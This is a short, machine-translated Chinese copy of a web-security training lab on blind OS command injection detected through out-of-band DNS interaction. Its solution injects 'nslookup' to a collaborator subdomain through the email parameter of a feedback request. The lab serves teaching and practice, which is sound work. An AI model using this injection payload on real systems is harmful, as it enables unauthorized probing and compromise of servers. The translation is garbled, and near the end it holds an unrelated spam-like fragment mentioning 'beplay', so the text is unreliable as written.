实验室:带外相互作用的盲目OS命令注射
从业者
该实验室包含一个盲目的操作系统指挥注射反馈功能中的漏洞。
该应用程序执行包含用户提供的详细信息的Shell命令。该命令是异步执行的,对应用程序的响应没有影响。无法将输出重定向到您可以访问的位置。但是,您可以与外部域触发带外的交互。
为了解决实验室,请利用盲目OS命令注射漏洞发出DNS查找给BURP合作者。
笔记
为了防止用于攻击第三方的学院平台,我们的防火墙会阻止实验室和任意外部系统之间的交互。要解决实验室,您必须使用BURP协作者的默认公共服务器。
解决方案
- 使用Burp Suite拦截和修改提交反馈的请求。
修改电子邮件
参数,将其更改为:
电子邮件= x || nslookup+x.burp-collaborator-subdomain ||
社区解决方案beplay维护得多久
迈克尔·索默(Michael Sommer)